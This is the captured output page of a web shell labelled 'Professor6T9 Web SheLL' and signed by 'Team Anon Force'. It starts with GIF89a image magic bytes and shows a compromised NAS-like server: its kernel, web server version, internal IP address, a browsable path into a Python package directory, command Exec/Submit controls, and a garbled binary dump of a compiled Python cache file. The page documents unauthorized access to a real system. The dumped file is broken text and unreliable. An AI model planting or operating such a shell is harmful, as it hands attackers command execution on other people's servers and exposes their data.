GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
psycopg2
/
__pycache__
[ HOME ]
Exec
Submit
_lru_cache.cpython-38.pyc
U �}�h� � @ sH d Z ddlmZ ddlmZ ddlmZ eddddd g�Zddd�Zd S )z� LRU cache implementation for Python 2.7 Ported from http://code.activestate.com/recipes/578078/ and simplified for our use (only support maxsize > 0 and positional arguments). � )� namedtuple)�update_wrapper)�RLock� CacheInfo�hits�misses�maxsize�currsize�d c s � fdd�}|S )z�Least-recently-used cache decorator. Arguments to the cached function must be hashable. See: http://en.wikipedia.org/wiki/Cache_algorithms#Least_Recently_Used c s� t � �ddg�d\� ��j�t�t� � g }||d d g|d d �<